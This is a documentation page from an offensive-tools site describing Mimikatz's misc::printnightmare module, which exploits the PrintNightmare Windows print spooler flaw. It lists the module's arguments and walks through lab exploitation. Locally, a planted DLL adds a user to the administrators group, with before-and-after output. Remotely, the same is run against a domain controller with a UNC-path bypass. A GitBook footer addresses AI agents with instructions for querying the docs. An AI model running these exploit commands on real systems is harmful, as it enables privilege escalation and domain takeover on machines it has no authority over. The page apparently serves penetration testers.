> For the complete documentation index, see [llms.txt](https://tools.thehacker.recipes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://tools.thehacker.recipes/mimikatz/modules/misc/printnightmare.md).

# printnightmare

`misc::printnightmare` can be used to exploit the [PrintNightMare](https://adamsvoboda.net/breaking-down-printnightmare-cve-2021-1675/) vulnerability in both \[[MS-RPRN RpcAddPrinterDriverEx](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b96cc497-59e5-4510-ab04-5484993b259b)] and \[[MS-PAR AddPrinterDriverEx](https://docs.microsoft.com/en-us/windows/win32/printdocs/addprinterdriverex)]. The bug was discovered by Zhiniang Peng ([@edwardzpeng](https://twitter.com/edwardzpeng?lang=en)) & Xuefeng Li ([@lxf02942370](https://twitter.com/lxf02942370?lang=en)). The MS-PAR function was discovered by [cube0x0](https://twitter.com/cube0x0). It has the following command line arguments:

* `/server`: the target server or workstation to exploit
* `/x64` or `/win64`: the target server or workstation is 64 bit
* `/x86` or `/win32`: the target server or workstation is 32 bit
* `/library`: the DLL to use during exploitation
* `/authuser`: the username to use during exploitation
* `/authdomain`: the active directory domain
* `/authpassword`: the password of the user
* `/clean`: clean-up the operation

The following example demonstrates local privilege escalation through printnightmare. As can be seen, the `test` user is not part of the local administrators group on the ***Win10.hacklab.local*** machine:

```
PS C:\Users\m3g9tr0n> net user

User accounts for \\WIN10

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
test                     vs2022                   WDAGUtilityAccount
The command completed successfully.

PS C:\Users\m3g9tr0n> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
hacklab\Domain Admins
hacklab\m3g9tr0n
vs2022
The command completed successfully.
```

After successful exploitation of printnightmare:

```
mimikatz # misc::printnightmare /library:C:\Users\Public\DLL.dll
[ms-rprn/ncalrpc] local
> RpcGetPrinterDriverDirectory: C:\Windows\system32\spool\DRIVERS\x64
| mimikatz-{55911f3b-474e-4b31-bb55-a2a6b4fc1e76}-legitprinter / Windows x64 - 0x00008018 - C:\Users\Public\DLL.dll
> RpcAddPrinterDriverEx: OK!
> RpcDeletePrinterDriverEx: OK!
```

The test user is now part of the local administrators group:

```
PS C:\Users\m3g9tr0n> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
hacklab\Domain Admins
hacklab\m3g9tr0n
test
vs2022
The command completed successfully.
```

For remote exploitation, the following can be used:

```
mimikatz # misc::printnightmare /server:dc.hacklab.local /library:\\win10.hacklab.local\smb\x64\mimilib.dll /authuser:optimus /authpassword:Super_SecretPass1! /authdomain:hacklab.local
```

With the [UNC path bypass](https://twitter.com/gentilkiwi/status/1412771368534528001?s=20):

```
mimikatz # misc::printnightmare /server:dc.hacklab.local /library:\??\UNC\win10.hacklab.local\smb\x64\mimilib.dll /authuser:optimus /authpassword:Super_SecretPass1! /authdomain:hacklab.local
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://tools.thehacker.recipes/mimikatz/modules/misc/printnightmare.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.